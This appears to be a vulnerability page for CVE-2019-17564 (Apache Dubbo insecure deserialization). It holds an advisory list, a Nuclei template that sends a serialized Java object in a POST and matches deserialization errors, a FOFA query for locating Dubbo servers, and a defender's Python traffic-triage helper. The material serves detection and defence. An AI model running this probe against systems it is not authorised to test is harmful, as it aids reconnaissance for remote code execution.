| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 2020 20:38 | – | gitee |
| The vulnerability of the Apache Dubbo RPC framework, related to deficiencies in the deserialization mechanism, allows attackers to execute arbitrary code. | 18 Aug 2025 00:00 | – | bdu_fstec |
| CVE-2019-17564 | 2 Apr 2020 02:28 | – | circl |
| Apache Dubbo Deserialization Vulnerability | 13 Feb 2020 00:00 | – | cnvd |
| Apache Dubbo Insecure Deserialization (CVE-2019-17564) | 11 Mar 2020 00:00 | – | checkpoint_advisories |
| CVE-2019-17564 | 1 Apr 2020 21:17 | – | cve |
| CVE-2019-17564 | 1 Apr 2020 21:17 | – | cvelist |
| Exploit for Deserialization of Untrusted Data in Apache Dubbo | 20 Feb 2020 08:28 | – | githubexploit |
| Deserialization of Untrusted Data in Apache Dubbo | 24 May 2022 17:13 | – | github |
| CVE-2019-17564 | 1 Apr 2020 22:15 | – | nvd |
```yaml
id: CVE-2019-17564

info:
  name: Apache Dubbo 2.5.x-2.7.4 - Insecure Deserialization
  author: Khalid6468
  severity: critical
  description: |
    Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code on Dubbo Provider instances with HTTP remoting enabled, leading to complete server compromise.
  remediation: |
    Upgrade to Apache Dubbo version 2.7.5 or later, or disable HTTP remoting if not required.
  reference:
    - https://advisory.checkmarx.net/advisory/CX-2020-4275
    - https://github.com/Hu3sky/CVE-2019-17564
    - https://github.com/r00t4dm/CVE-2019-17564
    - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17564
    cwe-id: CWE-502
    epss-score: 0.35564
    epss-percentile: 0.98257
    cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: dubbo
    fofa-query: app="apache-dubbo"
  tags: cve,cve2019,dubbo,apache,deserialization,rce,vkev,vuln

variables:
  interface: "com.example.TestService"

http:
  - method: POST
    path:
      - "{{BaseURL}}/{{interface}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      {{base64_decode('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')}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "java.lang.ClassNotFoundException"
          - "java.io.InvalidClassException"
          - "java.lang.ClassCastException"
          - "java.io.StreamCorruptedException"
          - "java.rmi.RemoteException: Deserialized object needs to be assignable"
        condition: or
      - type: status
        status:
          - 500
          - 400

    extractors:
      - type: regex
        part: body
        regex:
          - "java\\.lang\\..*Exception"
          - "java\\.io\\..*Exception"
# digest: 4a0a00473045022100bfe61529bb74778fb4ac30f6aa561b89e2e1bb90bd83683d8814821520b422b8022030456d1b1869eb64abb4e558ea32d409ccb49db28e5bf39dc32b832edd7f6ad9:922c64590222798bb761d5b6d8e72950
```
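The template above looks for the same two signals a defender can watch for in proxy or WAF traffic: a POST to a Dubbo HTTP-remoting interface path whose body is a raw Java object stream, and a provider response carrying one of the listed deserialization errors. The following Python triage helper is an added example, not part of the Vulners page or the Nuclei template; the interface-path pattern is an assumption and the sample request/response pair is constructed.

```python
import re

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Error strings the template above uses as evidence that the provider attempted
# to deserialize the request body.
DESER_ERROR_MARKERS = (
    "java.lang.ClassNotFoundException",
    "java.io.InvalidClassException",
    "java.lang.ClassCastException",
    "java.io.StreamCorruptedException",
    "java.rmi.RemoteException: Deserialized object needs to be assignable",
)

# Assumption: Dubbo HTTP remoting exposes each service at /<fully.qualified.Interface>.
INTERFACE_PATH = re.compile(r"^/(?:[A-Za-z_$][\w$]*\.)+[A-Za-z_$][\w$]*$")


def classify(method, path, headers, body, status=None, response_body=""):
    """Return the findings for one request/response pair (empty list = nothing of note)."""
    findings = []
    if method.upper() != "POST" or not INTERFACE_PATH.match(path):
        return findings
    findings.append("post-to-dubbo-interface-path")
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    if body.startswith(JAVA_STREAM_MAGIC):
        findings.append("java-serialized-body")
        # A Java object stream declared as a form post is the exact shape of the check above.
        if ctype.startswith("application/x-www-form-urlencoded"):
            findings.append("content-type-mismatch")
    if status in (400, 500) and any(m in response_body for m in DESER_ERROR_MARKERS):
        findings.append("provider-attempted-deserialization")
    return findings


def is_suspicious(findings):
    """A serialized body or a deserialization error is worth an analyst's attention."""
    return "java-serialized-body" in findings or "provider-attempted-deserialization" in findings


# Constructed sample traffic (not captured from any real system).
SAMPLE_PROBE = dict(method="POST", path="/com.example.TestService",
                    headers={"Content-Type": "application/x-www-form-urlencoded"},
                    body=JAVA_STREAM_MAGIC + b"sr\x00\x14com.example.Harmless", status=500,
                    response_body="java.lang.ClassNotFoundException: com.example.Harmless")
SAMPLE_FORM = dict(SAMPLE_PROBE, body=b"name=alice", status=200, response_body="ok")

if __name__ == "__main__":
    for sample in (SAMPLE_PROBE, SAMPLE_FORM):
        print(sample["body"][:4], classify(**sample), is_suspicious(classify(**sample)))
```

An ordinary form post to the same interface path yields only the path finding, so it is not flagged; only a Java object stream in the body or a deserialization error in the response raises the pair to suspicious.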